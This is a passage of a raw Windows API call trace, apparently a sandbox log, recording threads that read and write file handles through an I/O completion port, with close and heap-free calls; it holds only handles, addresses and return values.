lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.723] WriteFile (in: hFile=0x1c, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.723] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.723] CloseHandle (hObject=0x1c) returned 1 [0159.724] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.726] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.905] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 1 [0159.905] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.905] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3480020) returned 1 [0159.906] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.906] ReadFile (in: hFile=0x1d4, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x35a0020) returned 1 [0159.906] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.906] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x8439, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.906] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.907] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x113be, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020) returned 1 [0159.907] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.907] WriteFile (in: hFile=0x1d4, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x7422, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020) returned 1 [0159.907] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.907] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.907] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.908] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3480020) returned 0x0 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.908] ReadFile (in: hFile=0x1d4, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.908] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.908] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.908] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.908] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.908] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020) returned 1 [0159.909] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.909] WriteFile (in: hFile=0x1d4, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020) returned 1 [0159.909] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.909] CloseHandle (hObject=0x1d0) returned 1 [0159.910] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.913] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.913] CloseHandle (hObject=0x1a4) returned 1 [0159.916] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0159.918] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.918] CloseHandle (hObject=0x1d4) returned 1 [0159.919] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0159.922] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.386] ReadFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 1 [0160.403] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.403] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3480020) returned 1 [0160.403] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.403] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x35a0020) returned 1 [0160.404] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.404] ReadFile (in: hFile=0x19c, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x36c0020) returned 1 [0160.404] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.404] ReadFile (in: hFile=0x1a8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x37e0020) returned 1 [0160.405] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.405] ReadFile (in: hFile=0x1f0, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3900020) returned 1 [0160.405] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.405] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3a20020) returned 1 [0160.405] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.405] ReadFile (in: hFile=0x194, lpBuffer=0x3b40124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3b40020 | out: lpBuffer=0x3b40124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3b40020) returned 1 [0160.405] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.406] ReadFile (in: hFile=0x1ec, lpBuffer=0x3c60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3c60020 | out: lpBuffer=0x3c60124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3c60020) returned 1 [0160.406] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.406] WriteFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToWrite=0x17a1e, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 0x0 [0160.423] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.423] WriteFile (in: hFile=0x19c, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x1796c, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020) returned 1 [0160.430] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.430] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a20124, nNumberOfBytesToWrite=0xad9b, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3a20020) returned 0x0 [0160.437] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.437] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020) returned 1 [0160.461] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.461] WriteFile (in: hFile=0x1a8, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x37e0020) returned 1 [0160.465] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.469] CloseHandle (hObject=0x1e0) returned 1 [0160.486] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0160.488] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.527] WriteFile (in: hFile=0x1ec, lpBuffer=0x3c60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3c60020 | out: lpBuffer=0x3c60094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3c60020) returned 1 [0160.542] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0160.542] CloseHandle (hObject=0x1a0) returned 1 [0160.556] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3a20020) returned 1 [0160.559] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.665] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d40124*, nNumberOfBytesToWrite=0xd9d3, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3d40020 | out: lpBuffer=0x3d40124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3d40020) returned 1 [0168.689] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.701] WriteFile (in: hFile=0x1c4, lpBuffer=0x3680094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3680020 | out: lpBuffer=0x3680094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3680020) returned 1 [0168.708] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.708] WriteFile (in: hFile=0x1d0, lpBuffer=0x39e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x39e0020) returned 1 [0168.713] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0168.715] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3d40020) returned 1 [0168.715] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0168.715] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3e60020) returned 1 [0168.715] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.715] CloseHandle (hObject=0x194) returned 1 [0168.755] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37a0020) returned 1 [0168.758] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.758] CloseHandle (hObject=0x1f4) returned 1 [0168.787] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3b00020) returned 1 [0168.790] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.790] WriteFile (in: hFile=0x1e0, lpBuffer=0x3f80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3f80020 | out: lpBuffer=0x3f80094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3f80020) returned 1 [0168.813] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0168.813] CloseHandle (hObject=0x1e0) returned 1 [0168.834] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3f80020) returned 1 [0168.836] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 Thread: id = 120 os_tid = 0xbd0 [0148.851] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0155.972] CloseHandle (hObject=0x1b8) returned 1 [0156.004] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0156.007] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.007] CloseHandle (hObject=0x1ac) returned 1 [0156.011] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0156.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.323] WriteFile (in: hFile=0x1d8, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0xa1f8, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3750020) returned 1 [0156.328] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0156.328] 